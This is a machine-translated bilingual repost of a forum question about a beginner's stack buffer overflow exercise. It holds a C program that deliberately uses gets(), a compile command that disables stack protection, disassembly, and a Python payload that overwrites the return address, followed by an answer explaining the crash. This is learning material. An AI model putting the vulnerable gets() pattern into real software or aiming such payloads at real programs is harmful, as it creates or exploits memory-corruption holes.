[英]exploiting Buffer Overflow using gets() in a simple C program
I am new to Buffer Overflow exploits and I started with a simple C program. 我是Buffer Overflow漏洞的新手,我从一个简单的C程序开始。
Code 码
#include <stdio.h>
#include <strings.h>
void execs(void){
printf("yay!!");
}
void return_input (void)
{
char array[30];
gets(array);
}
int main()
{
return_input();
return 0;
}
Compilation stage 编译阶段
I compiled the above program with cc by disabling stack protector
as: 我用cc禁用
stack protector
编译了上面的程序:
cc test.c -o test -fno-stack-protector
The dump of the elf file using objdump
is as follows : 使用
objdump
转储elf文件如下:
0804843b <execs>:
804843b: 55 push %ebp
804843c: 89 e5 mov %esp,%ebp
804843e: 83 ec 08 sub $0x8,%esp
8048441: 83 ec 0c sub $0xc,%esp
8048444: 68 10 85 04 08 push $0x8048510
8048449: e8 b2 fe ff ff call 8048300 <printf@plt>
804844e: 83 c4 10 add $0x10,%esp
8048451: 90 nop
8048452: c9 leave
8048453: c3 ret
08048454 <return_input>:
8048454: 55 push %ebp
8048455: 89 e5 mov %esp,%ebp
8048457: 83 ec 28 sub $0x28,%esp
804845a: 83 ec 0c sub $0xc,%esp
804845d: 8d 45 da lea -0x26(%ebp),%eax
8048460: 50 push %eax
8048461: e8 aa fe ff ff call 8048310 <gets@plt>
8048466: 83 c4 10 add $0x10,%esp
8048469: 90 nop
804846a: c9 leave
804846b: c3 ret
0804846c <main>:
804846c: 8d 4c 24 04 lea 0x4(%esp),%ecx
8048470: 83 e4 f0 and $0xfffffff0,%esp
8048473: ff 71 fc pushl -0x4(%ecx)
8048476: 55 push %ebp
8048477: 89 e5 mov %esp,%ebp
8048479: 51 push %ecx
804847a: 83 ec 04 sub $0x4,%esp
804847d: e8 d2 ff ff ff call 8048454 <return_input>
8048482: b8 00 00 00 00 mov $0x0,%eax
8048487: 83 c4 04 add $0x4,%esp
804848a: 59 pop %ecx
804848b: 5d pop %ebp
804848c: 8d 61 fc lea -0x4(%ecx),%esp
804848f: c3 ret
So, In order to exploit the buffer( array
), we need to find the number of bytes allocated in the return_input
stack frame which by looking at the dump, 所以,为了利用缓冲区(
array
),我们需要通过查看转储来查找return_input
堆栈帧中分配的字节数,
lea -0x26(%ebp),%eax
is 0x26
in hex or roughly 38 in decimal. 是十六进制的
0x26
或十进制的大约38。 So, giving input as : 因此,输入为:
38+4(random chars)+(return addr of execs)
38 + 4(随机字符)+(返回高级管理员)
would execute the execs
function. 将执行
execs
函数。 I used the following: 我使用了以下内容:
python -c 'print "a"*42+"\x3b\x84\x04\x08"' | ./test
But output Error was: 但输出错误是:
Segmentation fault(core dumped)
分段故障(核心转储)
When I opened the core
(core dumped file) using gdb
, I could find that the segmentation fault was experienced when executing on the following address : 当我使用
gdb
打开core
(核心转储文件)时,我发现在执行以下地址时遇到了分段错误:
0xb76f2300
System information: 系统信息:
Ubuntu version : 16.10
Ubuntu版本:16.10
Kernel version : 4.8.0-46-generic
内核版本:4.8.0-46-generic
Question? 题?
What was I doing wrong in code? 我在代码中做错了什么?
I guess the reason is simple: you didn't halt / abort your program in the execs
. 我想原因很简单:你没有停止 /在中止程序
execs
。 That address 0xb76f2300
is on stack, so I suspect it is the return from the execs
that fails when it tries to return to the value of the stored stack pointer. 这个地址
0xb76f2300
是在栈,所以我怀疑它是从返回的execs
,当它试图返回到存储堆栈指针的值失败。
That you don't see any message is because the stdout
is line-buffered , and your message didn't have a new-line character, nor did you flush it explicitly; 您没有看到任何消息是因为
stdout
是行缓冲的 ,并且您的消息没有换行符,也没有显式刷新它; thus the yay!!
因此,
yay!!
will still be in the buffers. 仍将在缓冲区中。
Also, use a debugger. 另外,使用调试器。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.